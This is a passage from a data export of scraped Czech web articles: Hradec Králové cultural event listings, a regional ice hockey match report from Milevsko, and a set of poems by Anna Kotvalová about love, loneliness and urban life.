2024-12-03 16:30:00 2024-12-03 18:00:00 03.prosinec - úterý od 16:30 hodin Koncert, občerstvení, jarmark PhDr. Jana JebaváKonferenční sál 03.prosinec - úterý od 17:00 hodin Hérakles, starověký hrdina, neváhal bojovat se svým osudem a využil důvtipu a síly nejen pro vlastní slávu, ale i v prospěch lidstva. Dokázal víc než jiní lidé, ale o to více musel také vytrpět. Díky svým činům se stal nesmrtelným. Příběh Déianeiry je spjat s kentaurem Nessosem, který ji chtěl unést. Oba osudy hrdinů jsou časté i v sochařském umění, např. ve Valdštejnské zahradě v Praze . Mezi malíři můžeme zmínit autory jako jsou Zurbarán, Burne-Jones, Moreau či Boucher. Z cyklu Antická mytologie v umění. Obr. - generováno z AI. HANA MARIE KÖRNEROVÁ - VÁNOČNÍ SETKÁNÍ 03.prosinec - úterý od 17:00 hodin Hana Marie Körnerová si s vámi přijde popovídat nejen o knihách. Představí knihu Znamení hada, která je posledním dílem historické trilogie, a vyšla letos v září. Podělí se s vámi i o epizody z rozepsané knihy Počkej na mě inspirované historií vlastní rodiny z první poloviny dvacátého století. Můžete se těšit i na autogramiádu s možností zakoupit na místě autorčiny knihy. Předprodej vstupenek od 1. 10. 2024 na infopultu knihovny ve Wonkově ulici, v informačním centru HK a na www.hkpoint.cz. Vstupné 100 Kč. 03.prosinec - úterý od 17:30 hodin Tragikomická freska o rozpadu světa, tak jak ho známe. Král Lear je považován za autorovu „nejtragičtější“ hru, ale její zápletka až podezřele připomíná pohádkové Sůl nad zlato. Pohádka a zároveň obraz zkázy – Shakespere se neleká divokých, šílených spojení. Lear je hra, kde blázen vede slepého, kde se všechno převrací ve svůj opak, kde staré umírá a nové se ještě nezrodilo. Lear se zbavuje moci, aby si už jen užíval – a moc ho dožene k šílenství i poznání. Kupodivu se v celé té tragédii najde i mnoho humoru a vtipných situací, což je voda na mlýn režie Michala Háby , který s oblibou řeší vážné věci s humorem a naopak. Rozpad. Humor. Smrt. A stále Shakespeare. Režisér Michal Hába patří k nejoriginálnějším českým režisérům. Pro svůj návrat do Klicperovo divadla si po kultovním Lakomci či poslední “coolnes” Maryše zvolil další klasiku. Opět se tak můžete těšit na činohru evropského střihu, která se nebojí používat humor hodný Hradce . Současné divadlo o současném světě „Now you know“. 290 vstupné 290 Kč | Hlavní scéna - volné sezení | KLICPEROVO DIVADLO o.p.s. Hlavní scéna - volné sezení 2024-12-03 17:30:00 2024-12-03 19:10:00 SonsVogter 03.prosinec - úterý od 17:30 hodin Dozorkyně Eva (Sidse Babett Knudsen) je díky svému férovému přístupu oblíbená mezi vězni i kolegy. V okamžiku, kdy je do věznice převezen tajemný trestanec číslo 017, však Evin vyhlášený cit pro spravedlnost zatemní touha po osobní pomstě. Na oddělení se zvýšenou ostrahou rozehrává se svým novým svěřencem nebezpečnou hru na kočku a myš, která může zničit její pověst i kariéru. Po svém nervy drásajícím debutu Tísňové volání přináší dánský režisér Gustav Möller další psychologický thriller, který vás přiková k sedačkám. 160 vstupné 160 Kč | Velký sál | Bio Central Velký sál 2024-12-03 18:00:00 2024-12-03 19:18:00 War CorrespondentVálečný zpravodaj 03.prosinec - úterý od 18:00 hodin Celovečerní dokument přináší pohled na život a práci jednoho z nejvýznamnějších českých válečných zpravodajů Martina Dorazína . Znepokojující snímek režisérů Davida Čálka , Benjamina Tučka a producenta Václava Flegla vypráví osudy lidí, které válka přímo zasahuje, nabízí pohled na současný konflikt na Ukrajině , upozorňuje na širší kontext války a na význam válečné žurnalistiky. Prostřednictvím reportéra Martina Dorazína , skrz jeho postavu, objevujeme běžný život obyčejných lidí, dlouhodobě vystavených dopadům války. Ukazujeme sílu, která ve skutečnosti rozhoduje války. Není to vítězství na frontě, ale odolnost zázemí – ať už zvítězí jakákoli strana, lidé budou stejně pořád žít tam, kde žili. Téma odolnosti společnosti objevujeme očima válečného zpravodaje, prostřednictvím jeho práce se zvukem v rozhlasových reportážích. Ve filmu odkazujeme i na mimoválečný kontext – společnost je tak silná, jak silný je její nejslabší jedinec. Prohra většinou nenastává tam, kde se lidi semkli, protože samotné semknutí zvyšuje šanci na přežití celku. To je téma, které promlouvá i ke společnosti, válkou přímo neohrožené. 160 vstupné 160 Kč | Malý sál | Bio Central Malý sál 2024-12-03 19:00:00 2024-12-03 21:00:00 TOMÁŠ KAČO &amp;amp; KOUZLO VÁNOC 03.prosinec - úterý od 19:00 hodin Vánoční čas je obdobím, kdy se vracíme ke svým kořenům a vzpomínkám na dětství, kdy nás obklopovaly melodie, které nám zůstaly v srdci po celý život. Tomáš Kačo, virtuózní pianista a skladatel, vás srdečně zve na jedinečný vánoční recitál, který se uskuteční v krásném prostředí PETROF Gallery. Tomášovým životním krédem je přispět k lepšímu světu. Rád se proto věnuje i předávání zkušeností a nejmladší generaci. Je jedním z odborných mentorů pro podporu talentů Nadace Komárek Family Foundation, která stojí za projektem Piana do škol. O úvod večera se díky tomu postará mladý nadějný 17ti letý Vladimír Slavíček z Hradce Králové , stipendista nadace, jehož studium kromě hry na klavír zahrnuje i oblast elektronické hudby, aranžování a vlastní tvorbu. Tento koncert je také příležitostí podpořit projekt Piana do škol, který pomáhá základním uměleckým školám získat nové hudební nástroje. Společnost PETROF , ve které se koncert uskuteční, přispěje na tento projekt 50 % z vybrané ceny za vstupenky. Přijďte si užít kouzelný vánoční večer plný hudby a společně s námi podpořte mladé talenty, pro které je hudba neodmyslitelnou součástí života. 03.prosinec - úterý od 19:00 hodin Ne každá pravda je hezká, tak proč s ní chodit ven. Gaspard a Clémence jsou ještě relativně mladí senioři s velmi slušným důchodem. Žijí v krásném bytě a až na občasné drobné půtky, které jsou jen výrazem jejich temperamentu, je vše tak, jak má být. Jejich syn Lucas se oženil s krásnou Manon a mají spolu malého synka Roberta, kterého prarodiče čas od času hlídají. To vše až do dne, kdy před ústřední dvojicí dojde mezi Lucasem a Manon k prudké hádce. Manon má totiž milence a odjíždí s ním na dovolenou. Když oba mladí odejdou, dojde mezi Gaspardem a Clémence k debatě na téma, co bude dál. Má se Lucas rozvést? Gaspard je pro, Clémence proti. Netrvá to dlouho, názory se vyměňují stále rychleji, až dojde k jisté verbální nešikovnosti a na světlo vyplouvají dlouho pečlivě zasunutá tajemství. Hraji: Dana Morávková , Jan Čenský , Robert Hájek / František Skopal, Dominika Býmová / Ivana Korolová / Karolína Vágnerová Koncert 03.prosinec - úterý od 19:00 hodin "Já hraji na mandolu. Na kytaru mne doprovází vynikající kytarista Petr Fiala . Písničky prokládám básničkami, které neustále přibývají. Hrajeme převážně písničky, které za ta léta u mých posluchačů tak nějak zdomácněly, a některé z připravované desky..." Karel Plíhal , ojedinělý hudebník textař a poeta, v jedné chvíli dokáže publikum rozesmát veselou básničkou, aby vzápětí posluchače rozněžnil a roztesknil emotivním textem písně. Jednočlennou kapelu Karla Plíhala posílil skvělý kytarista Petr Fiala , kterého Karel potkal na hudební škole v Hradci Králové . Na Plíhalově koncertě posluchače čeká jemná a hravá poetika, komorní atmosféra a to vše ve formě inteligentně humorných, často vyzrále sebeironických textů nebo krátkých veršovánek uvozujících či doplňujících jednotlivé písničky. A zároveň famózní kytarové umění. v kavárně Café Filharmonieprojekt NAHRANÍ 03.prosinec - úterý od 19:30 hodin Kapela zaměřená primárně na muziku s vlivy blues a moderního country, nebránící se ale ani přesahům do jiných žánrů. Jsme sdružení seriózních hudebníků, kteří už mají (většinou) v osobním i hudebním životě něco za sebou, což zaručuje, v kombinaci s výjimečnými morálně-volními vlastnostmi všech členů, vyzrálý a inteligentní hudební i mluvený projev, který podpoří a ozvláštní atmosféru jakékoli akce. Díky pestrému repertoáru a flexibilnímu obsazení jsme schopni začlenit se do dramaturgie nejrůznějších festivalů, stadionových i komorních produkcí, koncertů, obecních oslav, zábav, firemních i soukromých akcí. 200 vstupné 200 Kč | Café Filharmonie | Filharmonie Hradec Králové Café Filharmonie 2024-12-03 20:00:00 2024-12-03 21:30:00 NASLEPO 03.prosinec - úterý od 20:00 hodin Máte rádi překvapení? Věříte dramaturgům kina, že vás dokáží příjemně překvapit? Když přijmete naši hru a zkusíte „Bio Central naslepo“, nebudete do poslední chvíle vědět, na jaký film jste se vypravili. Zato budete mít jistotu, že zaplatíte přesně takovou částku, jakou sami uznáte za vhodné. Předem totiž neplatíte nic. Po projekci pak dostanete možnost ocenit čerstvě nabytý zážitek částkou, kterou si sami určíte. A ještě jednu jistotu máte – pokud přijdete a zjistíte, že jste promítaný film už viděli, vykompenzujeme vám takovou ztrátu času jedním pivem zdarma. Jdete do toho? March to MayOd marca do mája 03.prosinec - úterý od 20:30 hodin Pod střechou starého vesnického domu spolu žije pětičlenná rodina. Zatímco rodiče pomalu stárnou, děti dospívají a je jasné, že se už brzy vydají vlastní cestou. Do neměnného rytmu každodenního života ale vstoupí nečekaná zpráva o matčině těhotenství a myšlenka na nového sourozence postupně zasahuje všechny obyvatele domu. Od marca do mája nabízí neokázalý, intimní portrét lidské soudržnosti, často vyjádřený těmi nejmenšími projevy. Nenápadný, ale mimořádně autentický příběh je natočený se stejnou něhou a trpělivostí, s jakou příroda probouzí své smysly v jarních měsících. Autor: OMEGA Czech - info@omegaczech.cz</t>
  </si>
  <si>
    <t>20241201_319_3473499833_8e506207fd3439c79b53.html</t>
  </si>
  <si>
    <t>8e506207fd3439c79b53</t>
  </si>
  <si>
    <t>Oslabení hokejisté Milevska po boji udolali Vimperk</t>
  </si>
  <si>
    <t>Oslabení hokejisté Milevska po boji udolali Vimperk 1.12.2024 0:10 MILEVSKO – Vítězná série pokračuje. Čtvrtý korálek na šňůru úspěchů přidali hokejisté Milevska v sobotu doma proti Vimperku , tedy soupeři, na jehož ledě v polovině října skončila neuvěřitelná série 29 vítězství za sebou. Odplata svěřencům trenéra Františka Ševčíka vyšla, ale byla to velká dřina. Domácí favorit totiž do zápasu vinou náročného programu a mnoha absencí nastoupil jen se třinácti hráči do pole, přičemž obránce Hubáček musel nastoupit v útoku a po jeho boku se objevil po více než roční přestávce také Radim Škrdleta. Šikovný útočník, který skončil kvůli pracovnímu vytížení, ale prokázal, že hokej hrát nezapomněl. Ve vyrovnaném a bojovném utkání se pod vítězství 4:3 podepsal dvěma body za krásný gól a asistenci – 4:3. Čtyřzápasovou domácí sérii tak zakončili hokejisté Milevska se stoprocentní bilancí dvanácti bodů a celkem během nich nasázeli 30 gólů. Nyní čeká Milevsko dvojkolo – v pátek 6. prosince hrají ve Veselí nad Lužnicí (19) a o den později doma přivítají Střelce Jindřichův Hradec (17). (2:1, 1:0, 1:2). Branky a nahrávky: 6. Hrakholski (Krcho, Masopust), 7. Hubáček (Škrdleta, Štekr), 30. Škrdleta (Přívozník), 57. Masopust (Hrakholski, Krcho) – 3. Paule (J. Předota, Kašpar), 45. Sitter (Bojer, A. Hrůša), 57. Sitter (Šafář, Vavřík). Milevsko : Novák – Štekr, Janda, Růžek, Pavlát – Suchan, Krcho, Masopust, Hrakholski, Chocholoušek, Škrdleta, Pouch, Přívozník, Hubáček. Vimperk : Dvořák – Horejš, O. Předota, P. Hrůša, Drabeš, J. Předota, A. Hrůša – Novotný, Klíma, Holub, Paukner, Vavřík, Boška, Šafář, Sitter, Kašpar, Paule, Bojer. Autor: Pavel Pubal Autor: Pavel Pubal Autor person Pavel Pubal</t>
  </si>
  <si>
    <t>18200</t>
  </si>
  <si>
    <t>14460</t>
  </si>
  <si>
    <t>20241201_32_3478714674_76d046a72a0fdd85a71b.html</t>
  </si>
  <si>
    <t>76d046a72a0fdd85a71b</t>
  </si>
  <si>
    <t>Anna Kotvalová: Záchrana přichází až po spadnutí opony</t>
  </si>
  <si>
    <t>Anna Kotvalová: Záchrana přichází až po spadnutí opony neděle 1. prosince 2024 Anna Kotvalová (* 1994) studuje doktorát na FSV UK, kde také učí několik předmětů, pracuje v nezisku, píše poezii a publicistické texty. Právě jí vyšla debutová sbírka poezie s názvem Etapy (v nakladatelství Adolescent), kterou pokřtí 5. 12. v Čítárně Unijazz, pozvánka zde. Z ní jsou i následující básně. Červen Přešla jsem na svou stranu řeky. Přes tři přechody se po půlnoci přeplazila. V zádech blikající neony a mladistvá těla Kampy . V létě se tam toulají milenci těsně před rozchodem. V Edenu už zavřeli. V zahradě. V nákupním domě. Odrazy slev v tmavých lesklých očích. Ty už tu nejsi, to jsou jen reklamy na šťastné páry, co nutně potřebují na terapii. Petřín žhne objímaný hvězdami. Spadaly z oblohy v roce, kdy ses narodil. V Národním divadle se dnes pro nemoc nehraje. Hamlet si zlomil nohu. Náhradník je nezvěstný, chlastá v nonstopu u nádraží. Žena mu ráno odešla za někým jiným. Dnes už ženy mohou odcházet ze vztahů, které jim ubližují. Někdy, když se jim poštěstí. Kam zmizelo, co bylo ve mně z tebe? Zůstalo to pobité v minulém roce, jako pšenice po šílené letní bouřce. Vichřice otřásá večerem, zapal svíčky a broukej ukolébavku hořícímu městu. Extrémní výkyvy počasí už budou v budoucnu jen a jen horší. Na rohu tvé ulice otevřeli další obchod s potravinami. Svět potřebuje přeplněné police, pytlíky rozpustné polévky, instantní životy do třiceti let. Obdivný potlesk pro ty, kteří to vydrželi. Záchrana vždy přichází až po spadnutí opony. Červenec Dávíme se cigaretovým kouřem, který vypustil z úst někdo jiný. Promrzlé paneláky. Dvě tuny cementu do míchačky. Rajská zahrada přeměřena developery. Bagry jsou už na cestě. Vyhnáni z ráje se rdousíme jablky, pliveme po sobě kolektivní vinu. Kremace v dlažebních kostkách. Kremace při úsvitu. Chce se nám spát, a tak odcházíme do zahrad, ve kterých už všechny jabloně dávno očesali. Srpen Opouští mě to potichu, nad ránem, než se rozezní první pláč šedivým panelákem. Kostky jsou pro ten den vrženy. Celý dlouhý rok – zavření. Největším rebelstvím její generace bylo zdánlivé ovládnutí samoty. Paty odřené od utíkání. Ložnice útočištěm včera vypitých flašek. Národní hrdinové zavření už přes rok v bunkrech z betonu. Tlačíš se ve frontách a hrbíš v předsálí. V hledišti už nezůstala žádná prázdná místa. Pro lidi jako ty schovávají ve večerce gumové rohlíky těsně před zavíračkou. Jako malý jsi zalézal pod stůl. Dnes se schováváš sám do sebe. Nedosáhnu na tebe. Noční můry se mění v mé partnery s prvním ranním kuropěním. Zase přišlo jaro a ženy v oknech leští okenice. Jejich muži leží na gauči udření sněním. Pošlu je za tebou, příště, až budou plánovat grandiózní revoluce. Cesta k Zimnímu paláci je dávno zastavěná. Sedíš tiše na místě. Nehneš se. Nádech a zdechneš. Sám v sobě nebo ve svém studentském bytě. Čistím si zuby v kuchyni a ty s ní spíš ve vedlejším pokoji. Známky únavy se už projevily na nás obou. Milujeme se, spíme s jinými. Jdeme s dobou. Oba nešťastní, bolestmi z dětství přikovaní pevně k posteli. Za svítání se marně rveš tam, kam už dávno nepatříš. Září Okna jsou zavřená. V rohu židle. Okna jsou stále zavřená. V rohu stůl. Bílý šum, naše bolest zastlaná do peřin. Inferno vztahu, srdce zalitá do cínu, chuť kovu, když tvůj jazyk vrůstá do mých dásní. Zvonivý chtíč. Cínová soulož. Kovové doteky. Srdce pomalu zastavují. Letokruhy mládí. A jako pohádkáři opouštějí po skončení své příběhy, opouštíme i my náš pokoj. Cínová sebevražda. Židle. Stůl. Okno – pootevřené. Květen Ruce objaly kolena, v dálce se pomiloval starý manželský pár. Vlak na zastávce zpomalil, když slunce tančilo neposedně v zornici tvých očí, miláčku, i když tu nejsi… Dva čápi na továrním komíně, po kterém v pátek šplhají gympláci s flaškou vína v ruce. Rezavé koleje porostlé vším, co člověk ještě nestihnul zahubit. Neměli bychom cítit tak moc a všechno najednou. Kolik kostí bys zlomil, kolik lásek zradil, abys opět našel ty lesy ve svých dlaních. Nahý ještě nejsi, když se ti osrdečník plní jehličím. Duby na obzoru se líně protahují k obloze. Je pěkné pomyslet, že na tebe na nádraží počká. První adventní neděle Pohřbili nás hluboko a naše duše rozprášili po obchodních centrech. Skrytě jsi kdysi věřil, že lidství vypadá jinak. Náhrobní kameny z plastiku. Vězení, které neumíš pojmenovat. Miluješ ji, rozpustné prášky proti samotě. Potíte se spolu po nocích, rutinní sex dvakrát do týdne. Ona performuje pro tvé ego. Sedmdesát procent žen nedosahuje vaginálního orgasmu. Znáš její tělo i duši, ale nedojímá tě to. Poprvé na gymplu potmě s dívkou a teď už napořád. Projíždíš krajinou, dlouhé víkendy s rodinou. Stmívá se brzy. Neutíkáš už do noci tak jako dřív. Koleje vedou dál, než sis z minula pamatoval. Vystoupíš na zastávce. Nikdo nečeká, jen rodný kraj tě vítá. Unylá vůně domova. Čeká na tebe v ložnici, děti uložené ke spánku. Začal jsi pít. Prvně, jen aby ses cítil v pořádku. Časem ztrácíš zájem o život, o sebe i o ni. Kolektivní systémové selhání. Na půdě jsi našel fotky z vysoké. Tolik dívek, ale jen jedna stále v noci usíná s tebou, pod víčky. Pauza protažená navěky. Fotky z promoce. Její třesoucí se nahé tělo. Plížíš se životem, každý leden si pouštíš žilou. V létě pojedete na dovolenou. Cykly zoufalství. Doufáš v zapomnění a pomalé odcházení z vlastní hlavy. Loučení se životem, o který ses neprosil. V neděli zpátky do Prahy . Vybalit tašky, domácí vajíčka od babičky. Koukáš z okna na světla města. Zradil jsi sám sebe, ale už je pozdě se omlouvat. Zhasneš světla, až půjdeš spát. Ještě tolikrát se přece budeš mýlit. Autor: Karel Škrabal Autor person Karel Škrabal</t>
  </si>
  <si>
    <t>20241201_320_3473493174_cca61ac76a8d67406a68.html</t>
  </si>
  <si>
    <t>cca61ac76a8d67406a68</t>
  </si>
  <si>
    <t>Kalendarium 27.února - čtvrtek od 19:00 hodin Kulturní akce dne: 14. 12. 2024 2024-12-14 07:49:00 2024-12-14 08:49:00 sraz vždy nejméně 15 minut předem 14.prosinec - sobota od 07:49 hodin Výjimečná příležitost prožít svítání z ochozu Bílé věže a vychutnat neopakovatelnou atmosféru probouzejícího se města. Sraz účastníků vždy nejméně 15 minut před časem svítání - východu slunce před Bílou věží. Počet účastníků je omezen na 30. Sobota 16. března v 06.06 hodin Sobota 15. června v 04.45 hodin Sobota 14. září v 06.31 hodin Sobota 14. prosince v 07.49 hodin 200 vstupné 200 Kč | Bílá věž | Hradecko Bílá věž 2024-12-14 08:00:00 2024-12-14 12:00:00 14.prosinec - sobota od 08:00 hodin --- Trhy se konají zpravidla pravidelně každých 14 dní. Výjimečné budou nejen skvělou nabídkou lokálních produktů, ale i tím, že vždy bude připraven zajímavý doprovodný program pro děti. Necháme dětem i jejich doprovodu nahlédnout do života farmářů, ukážeme, jak se staráme o půdu, pěstujeme zeleninu, květiny, chováme dobytek. Děti si budou moci vyzkoušet některé činnosti a třeba si i něco vyrobit nebo zasadit a odnést domů. VÁNOCE V EVROPĚ 14.prosinec - sobota od 08:00 hodin Prohlédněte si ručně vyrobené ozdobičky od žáků ze škol napříč Evropskou unií a zjistěte, jak se u nich slaví Vánoce. Spolufinancováno EU. Vstup volný. 14.prosinec - sobota od 09:00 hodin Členky Spolku lidové tvorby Hradec Králové Vás srdečně zvou na pravidelný kurz lidového tvoření, který proběhne: v sobotu od 9,00 do 14,00 hod., v budově Adalbertina Hradec Králové, ČSA 300, učebna č. 69, v 1. patře. Školné za 1 lekci je 150 Kč pro dospělého a 80 Kč pro dítě, platí se vždy celá lekce (každou sobotu). Prováděné činnosti: DÁRKOVÉ KRABIČKY – jak zabalit nezabalitelný dárek - pomůcky: háček, příze (Zuzana Vebersiková); PALIČKOVÁNÍ – pomůcky: herdule, paličky, špendlíky, nůžky, papír, háčkovací příze (Marie Jiroutová). Informace o lekcích – Monika Lemberková, tel.: 604 994 913, e-mail: monikaerbenova@seznam.cz Více informací získáte na stránkách spolku www.slthk.cz Program je realizován za podpory statutárního města Hradec Králové . Pořadatel: Spolek lidové tvorby HK 0 | Adalbertinum, učebna č. 69 | Adalbertinum, učebna č. 69 2024-11-01 09:00:00 2024-12-31 12:00:00 14.prosinec - sobota od 09:00 hodin V listopadu a prosinci 2024 si můžete v PETROF Gallery už podruhé prohlédnout “Pastely” Nadi Voldánové. Její obrazy nabízejí realistický pohled na objekty ze života kolem nás v kontrastu s černou a bílou plochou v osobitém pojetí výtvarnice, členky Unie výtvarných umělců Královéhradeckého regionu a také Náchodského výtvarného ateliéru Amag. Unikátní atmosféru hudební kavárny doplní přehlídka děl, vyvolávajících pocity pohody. Autorka, žijící střídavě v Praze a v České Skalici , se věnuje technice suchého pastelu, která jí umožňuje realizovat výtvarné záměry. 14.prosinec - sobota od 09:00 hodin Téma: Vánoční dekorace Přijďte s dětmi strávit adventní víkend v našem infocentru Hučák. Čeká na vás zajímavé vánoční tvoření a vstup je jako vždy zdarma. 14.prosinec - sobota od 10:00 hodin Kdo by neznal Kelty, jejich oppida a společnost? Doklady jejich přítomnosti pochází z celé republiky, avšak velká část východních Čech se nachází mimo centrum našeho keltského světa. Výstava představí právě tyto okrajové oblasti a zodpoví otázku, jestli zdejší krajinou chodili druidové nebo zde keltské lišky dávaly dobrou noc. 14.prosinec - sobota od 10:00 hodin Míša Růžičková : MINIDISKOTÉKA SE SLONÍKEM TONÍKEM - písničková show pro nejmenší Ahoj kamarádi, máte rádi zvířátka? Opičky, Hrošíka a ostatní? Společně se Sloníkem Toníkem se vydáme za Orangutanem, Pandou a Lenochodem. Naučíme se, jak se chovat mezi zvířátky Na rovníku a pořádně si to užijeme. Každému z nich zazpíváme písničku a zároveň si zatancujeme. U rozcvičky Ouky Kouky se protáhneme, Semafor nám ukáže, jestli můžeme přejít cestu, přes kterou jezdí houkající Auta, jako jsou Hasiči a Sanitka. A zopakujeme si, jak je důležité dávat pozor při sportu. Na závěr s Popeláři roztřídíme odpadky, které cestou najdeme a s Policejní písničkou si zacvičíme, zaběháme, zaskáčeme a chytneme zloděje. A co je nejdůležitější budeme se smát, zpívat, tancovat a budeme mít Krásný den:) Těší se na vás Míša Během vystoupení jsou děti zapojovány do písniček a mohou si zatančit před pódiem nebo s Míšou na pódiu. Délka představení je 50 - 60 minut, poté mají děti možnost se s Míšou setkat na autogramiádě, vyfotit se, nebo si nechat podepsat plakát, CD, DVD či tričko. OBRAZÁRNA | GEBAUEROVA HLAVA 14.prosinec - sobota od 10:00 hodin PÁ 29/11 | 15:00–17:00 (rodiče s dětmi 4–6 let) SO 30/11 | 10:00–12:00 (rodiče s dětmi 6–10 let) PÁ 13/12 | 15:00–17:00 (rodiče s dětmi 6–10 let) SO 14/12 | 10:00–12:00 (náctiletí 10–15 let) Rezervace: edukace@galeriehk.cz 14.prosinec - sobota od 10:00 hodin DIZAJNIŠTĚ - Krátkodobá výstava Kreativní hřiště pro malé i velké Kurátor: Tereza Vlašímská Vyrobily dílny Divadla Drak: Roman Beran, Michaela Kudelková, Hana Kopová, Layla Hruška Ottová, Štěpán Uherka Grafické úpravy: Jindřich Max Pavlíček Produkce: Barbora Kalinová, Martina Štětinová Technické řešení: Petr Seiner Světla: Libor Petr Lektorský program: Kateřina Hanková, Jana Neduha, Klára Fidlerová, Klára Svobodová Interaktivní výstava Dizajniště hravou formou seznamuje s metodou designového myšlení a krok za krokem děti naučí, jak myslet a navrhovat jako designér. Výstava provede návštěvníky cestou od designového nápadu až k jeho realizaci pomocí designového myšlení. Prostřednictvím jednoduchého návodu s pěti fázemi - empatie, definice, ideace, prototyp, testování - mohou účastníci ve své práci i každodenním životě objevovat nová kreativní řešení a zažít přitom spoustu tvůrčího dobrodružství. Designové myšlení učí kreativnímu řešení problémů, generování nápadů a schopnostem je vyhodnocovat, rozvíjí komunikační a prezentační dovednosti, podporuje práci v kolektivu, je inkluzivní, je zábavné, poučné a hravé. Pro školní kolektivy nabízíme lektorské programy, které návštěvníky provedou je celým kreativním procesem. Žáci a studenti si na nich osvojí sběr, třídění, analyzování a vyhodnocování informací a jak je mohou tvůrčím způsobem aplikovat v nových souvislostech a situacích. V pěti krocích se dostanou od nápadu k až realizaci. Účastníci přirozeně rozvinou celou řadu důležitých kompetencí: týmovou spolupráci, prezentaci, komunikaci a vizualizaci myšlenek, argumentaci, vedení diskuse i polemiky. Designové myšlení spojuje, narušuje bariéry mezi lidmi a přispívá k sebenaplnění. Lektorské programy pro školní kolektivy jsou uzpůsobeny různým věkovým kategoriím návštěvníků základních i středních škol. Autory expozice jsou designoví aktivisté, kreativci a patrioti z karlovarského spolku PROTEBE live, který již od roku 2005 buduje image Karlových Varů jako kulturního a občansky aktivního města. K tomu nemalou měrou pomáhá jejich kreativní centrum DIZAJNPARK v prostorách tuhnického výměníku. PŘÍBĚH DRAKU 1958-2018 - Stálá expozice Koncepce a libreto výstavy: Tomáš Jarkovský Návrh a realizace instalací: Tereza Vašíčková Odborná konzultace: Miloslav Klíma Spolupráce na instalaci: Dílny a technici Divadla Drak Určeno pro celou rodinu. Výstava Příběh Draku 1958–2018 vypráví příběh 60leté historie Divadla Drak. Prostřednictvím vystavených loutek, fotografií, scénografických návrhů, ukázek z inscenací a dalších dobových materiálů zachycuje proměny drakovského divadelního jazyka a zároveň přibližuje nezaměnitelnou atmosféru divadla. Představuje Drak jako místo tvorby, ale také jako křižovatku osudů těch, kteří jeho příběh po 60 let spoluvytvářeli. Expozice se skládá z 31 zastavení věnovaných významným inscenacím, osobnostem nebo událostem v historii divadla, která jsou rozdělena do osmi tematických celků. Prvních pět je řazeno chronologicky a vypraví příběh divadla od jeho počátků až k oslavám 60. výročí založení. Připomíná důležité milníky historie Draku a představuje významné inscenace či osobnosti, které jsou s jednotlivými etapami vývoje divadla spojeny. Poslední tři části-zastavení představující kompletní výpravu legendární inscenace O Sněhurce, unikátní dokument Jana Špáty a bilanci bohaté zájezdové činnosti divadla pak společně tvoří jakýsi epilog výstavy. Stručný komentář ke každému zastavení naleznete spolu s orientační mapkou v tištěném průvodci výstavou. Výstava byla realizována s finanční podporou Nadace ČEZ . HRADCEM KRÁLOVÉ S ARCHITEKTEM GOČÁREM 14.prosinec - sobota od 10:00 hodin Navštivte více než deset významných památek, včetně těch, do kterých se běžně nedostanete! Užijte si neocenitelný zážitek plný fascinujících příběhů a zajímavých faktů. Průvodcem vám bude věhlasný architekt Josef Gočár , který se podílel na rozvoji našeho krásného města v době první republiky. Pohlédnete na město očima stavitele a zavítáte na místa, kam vás letáčky z infocentra nezavedou. Zakoupit si můžete vstupenku na dopolední (500Kč) nebo odpolední (500Kč) část programu. Cena vstupenky zahrnuje veškeré vstupní poplatky! VSTUPY DOPOLEDNE – (Bílá věž, Galerie moderního umění , Šatlava, návštěva Okresního domu – secese) VSTUPY ODPOLEDNE – (Sbor kněze Ambrože, Muzeum, Vyhlídka ze střechy Gymnázia) --- Program dne: Dopolední část: „HISTORICKÝ HRADEC“ – 10:00-13:00 – Vhodné pro ty, kteří se chtějí dozvědět více o vzniku a historii Hradce Králové Setkáme se u Bílé věže, kde začíná naše dobrodružství. Vyslechnete si vyprávění o vzniku a vývoji Hradce Králové v kontextu tisíciletí. Dozvíte se, jak bylo královské věnné město přebudováno na barokní vojenskou pevnost. Prozkoumáte kapli sv. Klimenta , gotickou katedrálu sv. Ducha i barokní kostel Nanebevzetí Panny Marie. Nahlédnete do secesního paláce, ve kterém sídlí Galerie moderního umění. Projdete se po městských terasách a kolem zpívajících stromů. Navštívíme starobylé sklepy, místo bývalého hradu a kobky odsouzenců v někdejší městské šatlavě. Ve 13:00 si dáme lehký oběd, při kterém můžete ochutnat místní pivo . Odpolední část: „SALÓN REPUBLIKY“ – 14:00-18:00 – Vhodné pro všechny, kteří chtějí prozkoumat všechny poklady moderního Hradce Králové Pokračujeme od Klicperova divadla. Profesor Gočár vás vtáhne do fascinujícího příběhu o tom, jak se pevnost Hradec Králové během pouhých 30 let proměnila v moderní evropské město. Čeká vás přehlídka architektonických skvostů nejlepších stavitelů 20. století. Navštívíte Kotěrovo Muzeum východních Čech , které je zapsanou národní památkou. Projdete pěší zónou na Masarykovo náměstí s kulisami rondokubistických fasád. Na Ulrichově náměstí uvidíte hradecké mrakodrapy. Také nahlédnete do Sboru kněze Ambrože a kostela připomínajícího zaoceánský parník. Na Tylově nábřeží se rozhlédnete ze střechy Gymnázia J. K. Tyla, které má tvar otevřené knihy, odkud jako na dlani uvidíte Sanderovu secesní elektrárnu Hučák. Prohlídka končí v 18:00. Program se může změnit podle přání skupiny i neočekávaných událostí. --- PO ZAKOUPENÍ VSTUPENKY VOLEJTE PRŮVODCI PRO DALŠÍ INFORMACE NA ČÍSLO 777 637 888 Prohlídky jsou vhodné pro osoby starší 12 let. Lidem s omezenou hybností a rodičům s kočárky účast nedoporučujeme. Součástí jsou přestávky na osvěžení. V ceně jsou zahrnuty veškeré vstupy. Změna programu vyhrazena. --- Pohádky v AdaluVhodné pro děti od 3 let 14.prosinec - sobota od 10:00 hodin Půvabně inscenovaná loutková pohádka v barevných kulisách o napínavém, ale i veselém bloudění Jeníčka a Mařenky hlubokým lesem, určeno dětem od tří let. Účinkuje Hradecké Amatérské Divadlo loutek. Pokud je divákem dítě mladší, má vstup zdarma, ovšem bez nároku na místo. Vstupenku do sálu musí mít dětský i dospělý divák. Vstupenky nejsou číslovány, v sále je volný zasedací pořádek. Prosíme dospělé diváky, aby při výběru míst brali ohled na ty malé, kterým by případně mohli bránit ve výhledu. Děkujeme. 14.prosinec - sobota od 11:00 hodin 4. 12. 2024 - 18. 1. 2025 Vernisáž výstavy 4. prosince v 18 hodin. Otevřeno: Po - Pá 10 - 13, 14 - 17 hodin / So 11 - 16 hodin Galerie Koruna Autor: OMEGA Czech - info@omegaczech.cz</t>
  </si>
  <si>
    <t>20241201_321_3473490862_e2d74d45b5b79529b0a0.html</t>
  </si>
  <si>
    <t>e2d74d45b5b79529b0a0</t>
  </si>
  <si>
    <t>VI. abonentní koncert KPH: Ensemble Frizzante</t>
  </si>
  <si>
